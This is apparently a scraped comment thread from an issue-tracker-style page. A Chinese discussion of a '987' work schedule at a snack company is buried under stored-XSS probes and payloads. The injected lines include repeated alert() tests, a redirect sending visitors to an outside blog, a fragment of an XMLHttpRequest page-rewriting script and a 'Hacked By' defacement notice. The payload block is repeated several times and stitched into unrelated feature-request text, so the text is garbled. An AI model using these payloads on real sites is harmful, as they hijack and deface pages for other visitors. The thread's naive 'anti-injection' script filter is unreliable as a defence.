If it were too difficult to allow as the folder under root,
window.location.href='https://blogs.kainy.cn/?from=feathubXSS2';
setTimeout("javascript:location.href='hello.html'", 0);
how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。
反注入补丁 for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; }
]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/> 。
If it were too difficult to allow as the folder under root,
window.location.href='https://blogs.kainy.cn/?from=feathubXSS2';
setTimeout("javascript:location.href='hello.html'", 0);
how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。
反注入补丁 for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; }
]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/> 。
a58457432 commented over 1 year ago
987 ,加班成狗
| lwq-owesome commented over 1 year ago
你是?
DayDreamCoder commented over 1 year ago
987???整月无休?
firelion0725 commented over 1 year ago
这不是做零食的么
| cocoawork commented over 1 year ago
零食也都这么拼了么
broscar commented over 1 year ago
987等于是奴隶了,一天休息都没
| qingfengjiang commented over 1 year ago
简直没人性了吧,当成机器了吗...
JamesChenX commented over 1 year ago
alert('草榴社区');
chenyuzuishuai commented over 1 year ago
睿睿是大猪头!!!
chenyuzuishuai commented over 1 year ago
alert("睿睿是猪啊")
chenyuzuishuai commented over 1 year ago
alert("睿睿是猪啊")
xss67612 commented over 1 year ago
Hacked By Helen收徒QQ925999918
LinXueyuanStdio commented over 1 year ago Admin
img,svg,table{visibility: collapse;}
superzmy commented over 1 year ago
for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; }
反注入补丁 <script> for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } <script>
| zhangmichuan commented over 1 year ago
( TДT)
| zhangmichuan commented over 1 year ago
| zhangmichuan commented over 1 year ago
没有吧
zqingr commented over 1 year ago
console.log('test')
WXMTSQX commented over 1 year ago
WXMTSQX commented over 1 year ago
"/>alert("123456")<!-
Au9u5t commented over 1 year ago
alert('xss for test')
guotao commented about 1 year ago
If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。 反注入补丁 for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } ]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/> 。
guotao commented about 1 year ago
If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。 反注入补丁 for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } ]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/> 。